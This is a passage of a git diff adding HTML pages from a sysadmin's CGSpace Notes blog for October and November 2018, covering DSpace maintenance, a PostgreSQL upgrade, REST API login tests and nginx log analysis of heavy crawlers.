+<li>We also need to re-think the <code>dc.rights</code> field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)</li>
+<li>Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server</li>
+<li>IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script, and regenerated the controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt;
+2018-10-17-orcids.txt
+$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I also decided to add the ORCID identifiers that MEL had sent us a few months ago&hellip;</li>
+<li>One problem I had with the <code>resolve-orcids.py</code> script is that one user seems to have disabled their profile data since we last updated:</li>
+</ul>
+<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
+Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
+</code></pre><ul>
+<li>So I need to handle that situation in the script for sure, but I&rsquo;m not sure what to do organizationally or ethically, since that user disabled their name! Do we remove him from the list?</li>
+<li>I made a pull request and merged the ORCID updates into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/397">#397</a>)</li>
+<li>Improve the logic of name checking in my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script</li>
+</ul>
+<h2 id="2018-10-18">2018-10-18</h2>
+<ul>
+<li>I granted MEL&rsquo;s deposit user admin access to IITA, CIP, Bioversity, and RTB communities on DSpace Test so they can start testing real depositing</li>
+<li>After they do some tests and we check the values Enrico will send a formal email to Peter et al to ask that they start depositing officially</li>
+<li>I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually <a href="https://wiki.postgresql.org/wiki/Using_pg_upgrade_on_Ubuntu/Debian">migrate from 9.5 to 9.6</a>:</li>
+</ul>
+<pre tabindex="0"><code># su - postgres
+$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o &#39; -c config_file=/etc/postgresql/9.5/main/postgresql.conf&#39; -O &#39; -c config_file=/etc/postgresql/9.6/main/postgresql.conf&#39;
+$ exit
+# systemctl start postgresql
+# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
+</code></pre><h2 id="2018-10-19">2018-10-19</h2>
+<ul>
+<li>Help Francesca from Bioversity generate a report about items they uploaded in 2015 through 2018</li>
+<li>Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon</li>
+<li>Looking at the nginx logs around that time I see the following IPs making the most requests:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Oct/2018:(12|13|14|15)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    361 207.46.13.179
+    395 181.115.248.74
+    485 66.249.64.93
+    535 157.55.39.213
+    536 157.55.39.99
+    551 34.218.226.147
+    580 157.55.39.173
+   1516 35.237.175.180
+   1629 66.249.64.91
+   1758 5.9.6.51
+</code></pre><ul>
+<li>5.9.6.51 is MegaIndex, which I&rsquo;ve seen before&hellip;</li>
+</ul>
+<h2 id="2018-10-20">2018-10-20</h2>
+<ul>
+<li>I was going to try to run Solr in Docker because I learned I can run Docker on Travis-CI (for testing my dspace-statistics-api), but the oldest official Solr images are for 5.5, and DSpace&rsquo;s Solr configuration is for 4.9</li>
+<li>This means our existing Solr configuration doesn&rsquo;t run in Solr 5.5:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo docker pull solr:5
+$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
+$ sudo docker logs my_solr
+...
+ERROR: Error CREATEing SolrCore &#39;statistics&#39;: Unable to create core [statistics] Caused by: solr.IntField
+</code></pre><ul>
+<li>Apparently a bunch of variable types were removed in <a href="https://issues.apache.org/jira/browse/SOLR-5936">Solr 5</a></li>
+<li>So for now it&rsquo;s actually a huge pain in the ass to run the tests for my dspace-statistics-api</li>
+<li>Linode sent a message that the CPU usage was high on CGSpace (linode18) last night</li>
+<li>According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Oct/2018:(14|15|16)&#34; | awk &#39;{print $1}&#39; | sort
+ | uniq -c | sort -n | tail -n 10
+    249 207.46.13.179
+    250 157.55.39.173
+    301 54.166.207.223
+    303 157.55.39.213
+    310 66.249.64.95
+    362 34.218.226.147
+    381 66.249.64.93
+    415 35.237.175.180
+   1205 66.249.64.91
+   1227 5.9.6.51
+</code></pre><ul>
+<li>This bot is only using the XMLUI and it does <em>not</em> seem to be re-using its sessions:</li>
+</ul>
+<pre tabindex="0"><code># grep -c 5.9.6.51 /var/log/nginx/*.log
+/var/log/nginx/access.log:9323
+/var/log/nginx/error.log:0
+/var/log/nginx/library-access.log:0
+/var/log/nginx/oai.log:0
+/var/log/nginx/rest.log:0
+/var/log/nginx/statistics.log:0
+# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-10-20 | sort | uniq
+8915
+</code></pre><ul>
+<li>Last month I added &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager Valve&rsquo;s regular expression matching, and it seems to be working for MegaIndex&rsquo;s user agent:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1&#39; User-Agent:&#39;&#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;&#39;
+</code></pre><ul>
+<li>So I&rsquo;m not sure why this bot uses so many sessions — is it because it requests very slowly?</li>
+</ul>
+<h2 id="2018-10-21">2018-10-21</h2>
+<ul>
+<li>Discuss AfricaRice joining CGSpace</li>
+</ul>
+<h2 id="2018-10-22">2018-10-22</h2>
+<ul>
+<li>Post message to Yammer about usage rights (dc.rights)</li>
+<li>Change <code>build.properties</code> to use HTTPS for Handles in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+<li>We will still need to do a batch update of the <code>dc.identifier.uri</code> and other fields in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
+</code></pre><ul>
+<li>While I was doing that I found two items using CGSpace URLs instead of handles in their <code>dc.identifier.uri</code> so I corrected those</li>
+<li>I also found several items that had invalid characters or multiple Handles in some related URL field like <code>cg.link.reference</code> so I corrected those too</li>
+<li>Improve the usage rights on the submission form by adding a default selection with no value as well as a better hint to look for the CC license on the publisher page or in the PDF (<a href="https://github.com/ilri/DSpace/pull/398">#398</a>)</li>
+<li>I deployed the changes on CGSpace, ran all system updates, and rebooted the server</li>
+<li>Also, I updated all Handles in the database to use HTTPS:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
+UPDATE 76608
+</code></pre><ul>
+<li>Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem</li>
+<li>Help CGSpace users with some issues related to usage rights</li>
+</ul>
+<h2 id="2018-10-23">2018-10-23</h2>
+<ul>
+<li>Improve the usage rights (dc.rights) on CGSpace again by adding the long names in the submission form, as well as adding versio 3.0 and Creative Commons Zero (CC0) public domain license (<a href="https://github.com/ilri/DSpace/pull/399">#399</a>)</li>
+<li>Add &ldquo;usage rights&rdquo; to the XMLUI item display (<a href="https://github.com/ilri/DSpace/pull/400">#400</a>)</li>
+<li>I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace</li>
+<li>Testing REST login and logout via httpie because Felix from Earlham says he&rsquo;s having issues:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b POST &#39;https://dspacetest.cgiar.org/rest/login&#39; email=&#39;testdeposit@cgiar.org&#39; password=deposit
+acef8a4a-41f3-4392-b870-e873790f696b
+
+$ http POST &#39;https://dspacetest.cgiar.org/rest/logout&#39; rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
+</code></pre><ul>
+<li>Also works via curl (login, check status, logout, check status):</li>
+</ul>
+<pre tabindex="0"><code>$ curl -H &#34;Content-Type: application/json&#34; --data &#39;{&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;, &#34;password&#34;:&#34;deposit&#34;}&#39; https://dspacetest.cgiar.org/rest/login
+e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
+$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
+{&#34;okay&#34;:true,&#34;authenticated&#34;:true,&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;,&#34;fullname&#34;:&#34;Test deposit&#34;,&#34;token&#34;:&#34;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34;}
+$ curl -X POST -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/logout
+$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
+{&#34;okay&#34;:true,&#34;authenticated&#34;:false,&#34;email&#34;:null,&#34;fullname&#34;:null,&#34;token&#34;:null}%
+</code></pre><ul>
+<li>Improve the documentatin of my <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a></li>
+<li>Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners</li>
+</ul>
+<h2 id="2018-10-24">2018-10-24</h2>
+<ul>
+<li>I deployed the new Creative Commons choices to the usage rights on the CGSpace submission form</li>
+<li>Also, I deployed the changes to show usage rights on the item view</li>
+<li>Re-work the <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> to use Python&rsquo;s native json instead of ujson to make it easier to deploy in places where we don&rsquo;t have — or don&rsquo;t want to have — Python headers and a compiler (like containers)</li>
+<li>Re-work the deployment of the API to use systemd&rsquo;s <code>EnvironmentFile</code> to read the environment variables instead of <code>Environment</code> in the <a href="https://github.com/ilri/rmg-ansible-public">RMG Ansible infrastructure scripts</a></li>
+</ul>
+<h2 id="2018-10-25">2018-10-25</h2>
+<ul>
+<li>Send Peter and Jane a list of technical ToRs for AReS open source work:</li>
+<li>Basic version of AReS that works with metadata fields present in default DSpace 5.x/6.x (for example author, date issued, type, subjects)
+<ul>
+<li>Ability to harvest multiple repositories</li>
+<li>Configurable list of extra fields to harvest, per repository</li>
+<li>Configurable list of field and value mappings for consistent display/search with multiple repositories</li>
+<li>Configurable list of graphs/blocks to display on homepage</li>
+<li>Optional harvesting of DSpace view/download statistics if dspace-statistics-api is available on repository</li>
+<li>Optional harvesting of Altmetric mentions</li>
+<li>Configurable scheduling of harvesting (daily, weekly, etc)</li>
+<li>High-quality README.md on GitHub with description, requirements, deployment instructions, and license (GPLv3 unless ICARDA has a problem with that)</li>
+</ul>
+</li>
+<li>Maria asked if we can add publisher (<code>dc.publisher</code>) to the advanced search filters, so I created a <a href="https://github.com/ilri/DSpace/issues/401">GitHub issue</a> to track it</li>
+</ul>
+<h2 id="2018-10-28">2018-10-28</h2>
+<ul>
+<li>I forked the <a href="https://github.com/alanorth/SolrClient/tree/kazoo-2.5.0">SolrClient library and updated its kazoo dependency to be version 2.5.0</a> so we stop getting errors about &ldquo;async&rdquo; being a reserved keyword in Python 3.7</li>
+<li>Then I re-generated the <code>requirements.txt</code> in the <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-library</a> and released version 0.5.2</li>
+<li>Then I re-deployed the API on DSpace Test, ran all system updates on the server, and rebooted it</li>
+<li>I tested my hack of depositing to one collection where the default item and bistream READ policies are restricted and then mapping the item to another collection, but the item retains its default policies so Anonymous cannot see them in the mapped collection either</li>
+<li>Perhaps we need to try moving the item and inheriting the target collection&rsquo;s policies?</li>
+<li>I merged the changes for adding publisher (<code>dc.publisher</code>) to the advanced search to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/402">#402</a>)</li>
+<li>I merged the changes for adding versionless Creative Commons licenses to the submission form to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/403">#403</a>)</li>
+<li>I will deploy them later this week</li>
+</ul>
+<h2 id="2018-10-29">2018-10-29</h2>
+<ul>
+<li>I deployed the publisher and Creative Commons changes to CGSpace, ran all system updates, and rebooted the server</li>
+<li>I sent the email to Jane Poole and ILRI ICT and Finance to start the admin process of getting a new Linode server for AReS</li>
+</ul>
+<h2 id="2018-10-30">2018-10-30</h2>
+<ul>
+<li>Meet with the COPO guys to walk them through the CGSpace submission workflow and discuss CG core, REST API, etc
+<ul>
+<li>I suggested that they look into submitting via the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SWORDv2+Server">SWORDv2</a> protocol because it respects the workflows</li>
+<li>They said that they&rsquo;re not too worried about the hierarchical CG core schema, that they would just flatten metadata like affiliations when depositing to a DSpace repository</li>
+<li>I said that it might be time to engage the DSpace community to add support for more advanced schemas in DSpace 7+ (perhaps partnership with Atmire?)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-10-31">2018-10-31</h2>
+<ul>
+<li>More discussion and planning for AReS open sourcing and Amman meeting in 2019-10</li>
+<li>I did some work to clean up and improve the dspace-statistics-api README.md and project structure and <a href="https://github.com/ilri/dspace-statistics-api">moved it to the ILRI organization on GitHub</a></li>
+<li>Now the API serves some basic documentation on the root route</li>
+<li>I want to announce it to the dspace-tech mailing list soon</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-11/index.html b/docs/2018-11/index.html
new file mode 100644
index 000000000..32f663734
--- /dev/null
+++ b/docs/2018-11/index.html
@@ -0,0 +1,607 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2018" />
+<meta property="og:description" content="2018-11-01
+
+Finalize AReS Phase I and Phase II ToRs
+Send a note about my dspace-statistics-api to the dspace-tech mailing list
+
+2018-11-03
+
+Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
+Today these are the top 10 IPs:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-11/" />
+<meta property="article:published_time" content="2018-11-01T16:41:30+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2018"/>
+<meta name="twitter:description" content="2018-11-01
+
+Finalize AReS Phase I and Phase II ToRs
+Send a note about my dspace-statistics-api to the dspace-tech mailing list
+
+2018-11-03
+
+Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
+Today these are the top 10 IPs:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-11/",
+  "wordCount": "2823",
+  "datePublished": "2018-11-01T16:41:30+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-11/">
+
+    <title>November, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-11/">November, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-11-01">2018-11-01</h2>
+<ul>
+<li>Finalize AReS Phase I and Phase II ToRs</li>
+<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li>
+</ul>
+<h2 id="2018-11-03">2018-11-03</h2>
+<ul>
+<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
+<li>Today these are the top 10 IPs:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1300 66.249.64.63
+   1384 35.237.175.180
+   1430 138.201.52.218
+   1455 207.46.13.156
+   1500 40.77.167.175
+   1979 50.116.102.77
+   2790 66.249.64.61
+   3367 84.38.130.177
+   4537 70.32.83.92
+  22508 66.249.64.59
+</code></pre><ul>
+<li>The <code>66.249.64.x</code> are definitely Google</li>
+<li><code>70.32.83.92</code> is well known, probably CCAFS or something, as it&rsquo;s only a few thousand requests and always to REST API</li>
+<li><code>84.38.130.177</code> is some new IP in Latvia that is only hitting the XMLUI, using the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
+</code></pre><ul>
+<li>They at least seem to be re-using their Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177&#39; dspace.log.2018-11-03
+342
+</code></pre><ul>
+<li><code>50.116.102.77</code> is also a regular REST API user</li>
+<li><code>40.77.167.175</code> and <code>207.46.13.156</code> seem to be Bing</li>
+<li><code>138.201.52.218</code> seems to be on Hetzner in Germany, but is using this user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+</code></pre><ul>
+<li>And it doesn&rsquo;t seem they are re-using their Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218&#39; dspace.log.2018-11-03
+1243
+</code></pre><ul>
+<li>Ah, we&rsquo;ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day&hellip;</li>
+<li>I wonder if it&rsquo;s worth adding them to the list of bots in the nginx config?</li>
+<li>Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth</li>
+<li>Looking at the nginx logs again I see the following top ten IPs:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1979 50.116.102.77
+   1980 35.237.175.180
+   2186 207.46.13.156
+   2208 40.77.167.175
+   2843 66.249.64.63
+   4220 84.38.130.177
+   4537 70.32.83.92
+   5593 66.249.64.61
+  12557 78.46.89.18
+  32152 66.249.64.59
+</code></pre><ul>
+<li><code>78.46.89.18</code> is new since I last checked a few hours ago, and it&rsquo;s from Hetzner with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+</code></pre><ul>
+<li>It&rsquo;s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03
+8449
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03 | sort | uniq | wc -l
+1
+</code></pre><ul>
+<li><em>Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions</em></li>
+<li>I could add this IP to the list of bot IPs in nginx, but it seems like a futile effort when some new IP could come along and do the same thing</li>
+<li>Perhaps I should think about adding rate limits to dynamic pages like <code>/discover</code> and <code>/browse</code></li>
+<li>I think it&rsquo;s reasonable for a human to click one of those links five or ten times a minute&hellip;</li>
+<li>To contrast, <code>78.46.89.18</code> made about 300 requests per minute for a few hours today:</li>
+</ul>
+<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E &#39;03/Nov/2018:[0-9][0-9]:[0-9][0-9]&#39; | sort | uniq -c | sort -n | tail -n 20
+    286 03/Nov/2018:18:02
+    287 03/Nov/2018:18:21
+    289 03/Nov/2018:18:23
+    291 03/Nov/2018:18:27
+    293 03/Nov/2018:18:34
+    300 03/Nov/2018:17:58
+    300 03/Nov/2018:18:22
+    300 03/Nov/2018:18:32
+    304 03/Nov/2018:18:12
+    305 03/Nov/2018:18:13
+    305 03/Nov/2018:18:24
+    312 03/Nov/2018:18:39
+    322 03/Nov/2018:18:17
+    326 03/Nov/2018:18:38
+    327 03/Nov/2018:18:16
+    330 03/Nov/2018:17:57
+    332 03/Nov/2018:18:19
+    336 03/Nov/2018:17:56
+    340 03/Nov/2018:18:14
+    341 03/Nov/2018:18:18
+</code></pre><ul>
+<li>If they want to download all our metadata and PDFs they should use an API rather than scraping the XMLUI</li>
+<li>I will add them to the list of bot IPs in nginx for now and think about enforcing rate limits in XMLUI later</li>
+<li>Also, this is the third (?) time a mysterious IP on Hetzner has done this&hellip; who is this?</li>
+</ul>
+<h2 id="2018-11-04">2018-11-04</h2>
+<ul>
+<li>Forward Peter&rsquo;s information about CGSpace financials to Modi from ICRISAT</li>
+<li>Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again</li>
+<li>Here are the top ten IPs active so far this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1083 2a03:2880:11ff:2::face:b00c
+   1105 2a03:2880:11ff:d::face:b00c
+   1111 2a03:2880:11ff:f::face:b00c
+   1134 84.38.130.177
+   1893 50.116.102.77
+   2040 66.249.64.63
+   4210 66.249.64.61
+   4534 70.32.83.92
+  13036 78.46.89.18
+  20407 66.249.64.59
+</code></pre><ul>
+<li><code>78.46.89.18</code> is back&hellip; and it is still actually re-using its Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04
+8765
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
+1
+</code></pre><ul>
+<li><em>Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly</em></li>
+<li>Also, now we have a ton of Facebook crawlers:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
+    905 2a03:2880:11ff:b::face:b00c
+    955 2a03:2880:11ff:5::face:b00c
+    965 2a03:2880:11ff:e::face:b00c
+    984 2a03:2880:11ff:8::face:b00c
+    993 2a03:2880:11ff:3::face:b00c
+    994 2a03:2880:11ff:7::face:b00c
+   1006 2a03:2880:11ff:10::face:b00c
+   1011 2a03:2880:11ff:4::face:b00c
+   1023 2a03:2880:11ff:6::face:b00c
+   1026 2a03:2880:11ff:9::face:b00c
+   1039 2a03:2880:11ff:1::face:b00c
+   1043 2a03:2880:11ff:c::face:b00c
+   1070 2a03:2880:11ff::face:b00c
+   1075 2a03:2880:11ff:a::face:b00c
+   1093 2a03:2880:11ff:2::face:b00c
+   1107 2a03:2880:11ff:d::face:b00c
+   1116 2a03:2880:11ff:f::face:b00c
+</code></pre><ul>
+<li>They are really making shit tons of requests:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
+37721
+</code></pre><ul>
+<li><em>Updated on 2018-12-04 to correct the grep command to accurately show the number of requests</em></li>
+<li>Their user agent is:</li>
+</ul>
+<pre tabindex="0"><code>facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
+</code></pre><ul>
+<li>I will add it to the Tomcat Crawler Session Manager valve</li>
+<li>Later in the evening&hellip; ok, this Facebook bot is getting super annoying:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
+   1871 2a03:2880:11ff:3::face:b00c
+   1885 2a03:2880:11ff:b::face:b00c
+   1941 2a03:2880:11ff:8::face:b00c
+   1942 2a03:2880:11ff:e::face:b00c
+   1987 2a03:2880:11ff:1::face:b00c
+   2023 2a03:2880:11ff:2::face:b00c
+   2027 2a03:2880:11ff:4::face:b00c
+   2032 2a03:2880:11ff:9::face:b00c
+   2034 2a03:2880:11ff:10::face:b00c
+   2050 2a03:2880:11ff:5::face:b00c
+   2061 2a03:2880:11ff:c::face:b00c
+   2076 2a03:2880:11ff:6::face:b00c
+   2093 2a03:2880:11ff:7::face:b00c
+   2107 2a03:2880:11ff::face:b00c
+   2118 2a03:2880:11ff:d::face:b00c
+   2164 2a03:2880:11ff:a::face:b00c
+   2178 2a03:2880:11ff:f::face:b00c
+</code></pre><ul>
